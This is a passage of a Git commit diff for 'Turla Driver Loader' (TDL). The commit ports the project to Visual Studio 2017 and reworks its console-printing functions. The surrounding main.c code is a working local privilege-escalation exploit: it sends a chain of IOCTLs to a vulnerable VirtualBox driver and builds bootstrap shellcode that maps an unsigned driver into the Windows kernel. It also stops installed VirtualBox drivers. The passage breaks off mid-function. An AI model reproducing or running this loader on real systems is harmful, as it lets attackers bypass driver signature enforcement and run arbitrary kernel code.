nopriest
/
TDL
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

v 1.1.4 

Fixed #29, project ported to MSVS2017.
This commit is contained in:
hfiref0x 2019-01-05 14:58:41 +07:00
parent 1794592f64
commit 8cb23174a1
12 changed files with 9109 additions and 4503 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Furutaka.exe
View File

Binary file not shown.

14
README.md
View File

@ -33,13 +33,25 @@ It uses WinNT/Turla VirtualBox kernel mode exploit technique to write code to th
TDL comes with full source code.
In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above.
## Instructions
* Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
* v120 for Visual Studio 2013;
* v140 for Visual Studio 2015;
* v141 for Visual Studio 2017.
* For v140 and above set Target Platform Version (Project->Properties->General):
* If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
* If v141 then select 10.0.17763.0 (Note that Windows 10.0.17763 SDK must be installed).
Remove linker option /NOCOFFGRPINFO where it unsupported/unavailable.
# Deprecation
TDL based on old Oracle VirtualBox driver which was created in 2008. This driver wasn't designed to be compatible with newest Windows operation system versions and may work incorrectly. Because TDL entirely based on this exact VirtualBox driver version LPE it is not wise to use it on newest version of Windows. Consider this repository as depricated/abandonware. The only possible updates can be related only to TDL loader itself.
# Authors
(c) 2016 - 2018 TDL Project
(c) 2016 - 2019 TDL Project
# Credits

28
Source/Furutaka/Furutaka.vcxproj
View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
@ -14,21 +14,20 @@
<ProjectGuid>{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Furutaka</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
<ProjectName>Furutaka</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
@ -47,7 +46,7 @@
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
@ -63,8 +62,8 @@
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -78,7 +77,7 @@
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Full</Optimization>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
@ -86,9 +85,13 @@
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<FavorSizeOrSpeed>Neither</FavorSizeOrSpeed>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<ControlFlowGuard>false</ControlFlowGuard>
<TreatWarningAsError>true</TreatWarningAsError>
<BufferSecurityCheck>false</BufferSecurityCheck>
<AssemblerOutput>AssemblyCode</AssemblerOutput>
<AssemblerListingLocation>$(IntDir)\asmlist\</AssemblerListingLocation>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -98,6 +101,9 @@
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
<Version>6.0</Version>
<ShowProgress>LinkVerboseLib</ShowProgress>
<AdditionalOptions>/NOCOFFGRPINFO %(AdditionalOptions)</AdditionalOptions>
</Link>
</ItemDefinitionGroup>
<ItemGroup>

2
Source/Furutaka/Furutaka.vcxproj.user
View File

@ -5,7 +5,7 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>c:\altair\tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

156
Source/Furutaka/cui.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
* (C) COPYRIGHT AUTHORS, 2016 - 2018
*
* TITLE: CUI.C
*
* VERSION: 1.10
* VERSION: 1.30
*
* DATE: 20 Mar 2017
* DATE: 01 Aug 2018
*
* Console output.
*
@ -18,20 +18,93 @@
*******************************************************************************/
#include "global.h"
HANDLE g_ConOut = NULL, g_ConIn = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
/*
* cuiInitialize
*
* Purpose:
*
* Initialize console input/output.
*
*/
VOID cuiInitialize(
_In_ BOOL InitInput,
_Out_opt_ PBOOL IsConsoleOutput
)
{
ULONG dummy;
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (InitInput) g_ConIn = GetStdHandle(STD_INPUT_HANDLE);
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
g_ConsoleOutput = TRUE;
if (!GetConsoleMode(g_ConOut, &dummy)) {
g_ConsoleOutput = FALSE;
WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);
}
if (IsConsoleOutput)
*IsConsoleOutput = g_ConsoleOutput;
return;
}
/*
* cuiClrScr
*
* Purpose:
*
* Clear screen.
*
*/
VOID cuiClrScr(
VOID
)
{
COORD coordScreen;
DWORD cCharsWritten;
DWORD dwConSize;
CONSOLE_SCREEN_BUFFER_INFO csbi;
coordScreen.X = 0;
coordScreen.Y = 0;
if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
return;
dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),
dwConSize, coordScreen, &cCharsWritten))
return;
if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
return;
if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,
dwConSize, coordScreen, &cCharsWritten))
return;
SetConsoleCursorPosition(g_ConOut, coordScreen);
}
/*
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
*
* ANSI variant
* ANSI version.
*
*/
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
@ -46,7 +119,7 @@ VOID cuiPrintTextA(
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = (5 + consoleIO);
consoleIO = 5 + consoleIO;
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
@ -55,11 +128,11 @@ VOID cuiPrintTextA(
consoleIO = _strlen_a(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
if (g_ConsoleOutput != FALSE) {
WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL);
WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
@ -71,16 +144,13 @@ VOID cuiPrintTextA(
* Purpose:
*
* Output text to the console or file.
*
* UNICODE variant
* UNICODE version.
*
*/
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
)
{
SIZE_T consoleIO;
DWORD bytesIO;
@ -89,25 +159,65 @@ VOID cuiPrintTextW(
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
consoleIO = _strlen_w(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = (5 + consoleIO) * sizeof(WCHAR);
consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
if (UseReturn) _strcat_w(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
consoleIO = _strlen_w(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
if (g_ConsoleOutput != FALSE) {
WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* cuiPrintTextLastErrorA
*
* Purpose:
*
* Output LastError translated code to the console or file.
* ANSI version.
*
*/
VOID cuiPrintTextLastErrorA(
_In_ BOOL UseReturn
)
{
CHAR szTextBuffer[512];
DWORD dwLastError = GetLastError();
FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, 512, NULL);
cuiPrintTextA(szTextBuffer, UseReturn);
}
/*
* cuiPrintTextLastErrorW
*
* Purpose:
*
* Output LastError translated code to the console or file.
* UNICODE version.
*
*/
VOID cuiPrintTextLastErrorW(
_In_ BOOL UseReturn
)
{
WCHAR szTextBuffer[512];
DWORD dwLastError = GetLastError();
FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, 512, NULL);
cuiPrintTextW(szTextBuffer, UseReturn);
}

50
Source/Furutaka/cui.h
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
* (C) COPYRIGHT AUTHORS, 2016 - 2018
*
* TITLE: CUI.H
*
* VERSION: 1.10
* VERSION: 1.30
*
* DATE: 04 Feb 2017
* DATE: 01 Aug 2018
*
* Common header file for console ui.
*
@ -18,22 +18,38 @@
*******************************************************************************/
#pragma once
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
VOID cuiInitialize(
_In_ BOOL InitInput,
_Out_opt_ PBOOL IsConsoleOutput
);
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
#ifdef UNICODE
#ifdef _UNICODE
#define cuiPrintText cuiPrintTextW
#define cuiPrintTextLastError cuiPrintTextLastErrorW
#else
#define cuiPrintText cuiPrintTextA
#define cuiPrintTextLastError cuiPrintTextLastErrorA
#endif
VOID cuiPrintTextA(
_In_ LPSTR lpText,
_In_ BOOL UseReturn
);
VOID cuiPrintTextW(
_In_ LPWSTR lpText,
_In_ BOOL UseReturn
);
VOID cuiPrintTextLastErrorA(
_In_ BOOL UseReturn
);
VOID cuiPrintTextLastErrorW(
_In_ BOOL UseReturn
);
VOID cuiClrScr(
VOID
);

12
Source/Furutaka/global.h
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
* (C) COPYRIGHT AUTHORS, 2016 - 2019
*
* TITLE: GLOBAL.H
*
* VERSION: 1.11
* VERSION: 1.14
*
* DATE: 20 Apr 2017
* DATE: 05 Jan 2019
*
* Common header file for the program support routines.
*
@ -21,10 +21,7 @@
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#include <Windows.h>
#include <ntstatus.h>
@ -40,11 +37,14 @@
#error ANSI build is not supported
#endif
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
#endif

216
Source/Furutaka/main.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2018
* (C) COPYRIGHT AUTHORS, 2016 - 2019
*
* TITLE: MAIN.C
*
* VERSION: 1.13
* VERSION: 1.14
*
* DATE: 09 Mar 2018
* DATE: 05 Jan 2019
*
* Furutaka entry point.
*
@ -18,7 +18,6 @@
*******************************************************************************/
#include "global.h"
#include <process.h>
#include "vbox.h"
#include "shellcode.h"
@ -28,24 +27,21 @@ volatile LONG g_lApplicationInstances = 0;
#pragma comment(linker, "/Section:shrd,RWS")
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
HANDLE g_hVBox = INVALID_HANDLE_VALUE;
BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE;
WCHAR g_BE = 0xFEFF;
ULONG g_NtBuildNumber = 0;
#define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka"
#define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.3 (09/03/18)")
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.4 (05/01/19)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.3 started\r\n(c) 2016 - 2018 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader DriverToLoad\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.4 started\r\n(c) 2016 - 2019 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
#define T_VBOXDETECT TEXT("Ldr: Detected VirtualBox software installation, driver backup will be done")
/*
* TDLVBoxInstalled
@ -149,7 +145,7 @@ ULONG_PTR TDLGetProcAddress(
ULONG_PTR pfn = 0;
RtlInitString(&cStr, FunctionName);
if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn)))
if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID*)&pfn)))
return 0;
return KernelBase + (pfn - KernelImage);
@ -243,7 +239,7 @@ void TDLExploit(
&Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie,
SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), TRUE);
break;
}
@ -261,19 +257,19 @@ void TDLExploit(
SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr,
SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x"));
u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
ImageBase = OpenLdr.u.Out.pvImageBase;
memIO = PAGE_SIZE + CodeSize;
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO,
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID*)&pLoadTask, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pLoadTask == NULL)
@ -299,7 +295,7 @@ void TDLExploit(
pLoadTask, pLoadTask->Hdr.cbIn,
pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), TRUE);
break;
}
else {
@ -310,7 +306,7 @@ void TDLExploit(
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
RtlSecureZeroMemory(&vmFast, sizeof(vmFast));
@ -326,21 +322,21 @@ void TDLExploit(
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), TRUE);
break;
}
else {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), TRUE);
}
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), TRUE);
paramOut = 0;
DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP,
NULL, 0,
&paramOut, sizeof(paramOut), &bytesIO, NULL);
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: SUP_IOCTL_LDR_FREE"), TRUE);
RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree));
ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
@ -360,7 +356,7 @@ void TDLExploit(
if (pLoadTask != NULL) {
memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE);
NtFreeVirtualMemory(NtCurrentProcess(), (PVOID*)&pLoadTask, &memIO, MEM_RELEASE);
}
if (g_hVBox != INVALID_HANDLE_VALUE) {
@ -400,19 +396,19 @@ UINT TDLMapDriver(
_strcpy(text, TEXT("Ldr: Kernel base = 0x"));
u64tohex(KernelBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
RtlSecureZeroMemory(&uStr, sizeof(uStr));
RtlInitUnicodeString(&uStr, lpDriverFullName);
status = LdrLoadDll(NULL, &DllCharacteristics, &uStr, (PVOID)&Image);
status = LdrLoadDll(NULL, &DllCharacteristics, &uStr, (PVOID*)&Image);
if ((!NT_SUCCESS(status)) || (Image == NULL)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error while loading input driver file"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: Input driver file loaded at 0x"));
u64tohex((ULONG_PTR)Image, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
FileHeader = RtlImageNtHeader(Image);
@ -421,69 +417,69 @@ UINT TDLMapDriver(
isz = FileHeader->OptionalHeader.SizeOfImage;
cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Loading ntoskrnl.exe"), TRUE);
RtlInitUnicodeString(&uStr, L"ntoskrnl.exe");
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage);
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID*)&KernelImage);
if ((!NT_SUCCESS(status)) || (KernelImage == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error while loading ntoskrnl.exe"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x"));
u64tohex(KernelImage, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
RtlInitString(&routineName, "ExAllocatePoolWithTag");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag);
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xExAllocatePoolWithTag);
if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x"));
u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error, PsCreateSystemThread address not found"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x"));
u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
RtlInitString(&routineName, "ZwClose");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose);
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xZwClose);
if ((!NT_SUCCESS(status)) || (xZwClose == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error, ZwClose address not found"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ZwClose 0x"));
u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
}
memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID*)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (Buffer == NULL) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error, unable to allocate shellcode"), TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: Shellcode allocated at 0x"));
u64tohex((ULONG_PTR)Buffer, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
cuiPrintText(text, TRUE);
}
// mov rcx, ExAllocatePoolWithTag
@ -516,20 +512,20 @@ UINT TDLMapDriver(
if (g_NtBuildNumber < 15063) {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Default bootstrap shellcode selected"), TRUE);
}
else {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2));
cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), TRUE);
}
RtlCopyMemory(Buffer + dataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Resolving kernel import"), TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Executing exploit"), TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset);
result = 0;
break;
@ -537,7 +533,7 @@ UINT TDLMapDriver(
if (Buffer != NULL) {
memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE);
NtFreeVirtualMemory(NtCurrentProcess(), (PVOID*)&Buffer, &memIO, MEM_RELEASE);
}
return result;
@ -568,11 +564,7 @@ HANDLE TDLStartVulnerableDriver(
//lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere.
RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName));
if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), TRUE);
break;
}
@ -581,39 +573,37 @@ HANDLE TDLStartVulnerableDriver(
SC_MANAGER_ALL_ACCESS
);
if (schSCManager == NULL) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error opening SCM database"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error opening SCM database"), TRUE);
break;
}
//lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive
if (supIsObjectExists(L"\\Device", L"VBoxDrv")) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Active VirtualBox found in system, attempt unload it"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), TRUE);
if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetAdp driver unloaded"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("SCM: VBoxNetAdp driver unloaded"), TRUE);
}
if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetLwf driver unloaded"),
g_ConsoleOutput, TRUE);
